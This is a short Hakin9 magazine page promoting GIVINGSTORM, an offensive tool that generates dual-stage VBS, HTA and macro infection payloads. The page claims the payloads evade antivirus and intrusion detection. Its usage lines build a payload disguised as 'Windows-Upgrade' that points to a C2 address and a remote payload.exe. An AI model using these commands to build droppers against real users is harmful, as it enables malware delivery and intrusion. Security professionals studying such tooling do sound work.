GIVINGSTORM - Infection vector that bypasses AV, IDS, and IPS. (For now...)

Jul 13, 2020

The beginnings of a C2 framework. Currently without all the C2 stuff so far. Generates a dual-stage VBS infection vector, and a dual-stage HTA infection vector. The variables take into account C2 addresses, Koadic/Empire payloads, and a few delivery mechanisms. The payload files are output to an aptly named directory "Payloads" that is created if not already present.

Installation & Usage

GIVINGSTORM is a breeze to use. Simply clone the directory, and cd into it.

For the HTA payload: python3 GIVINGSTORM.py -n Windows-Upgrade -p b64encodedpayload -c amazon.com/c2/domain

HTA Example

alt text

For the Macro Subroutine: python3 GIVINGSTORM.py -n Windows-Upgrade -e amazon.com/final/payload.exe

Macro Example

alt text

More: https://github.com/nins3i/GIVINGSTORM

Recommended From Hakin9

Author

Hakin9 TEAM
Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

1 Comment
Newest
Oldest Most Voted
Inline Feedbacks
View all comments
11 months ago

This repository has been archived by the owner on Feb 9, 2023. It is now read-only.

so no new updates

© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023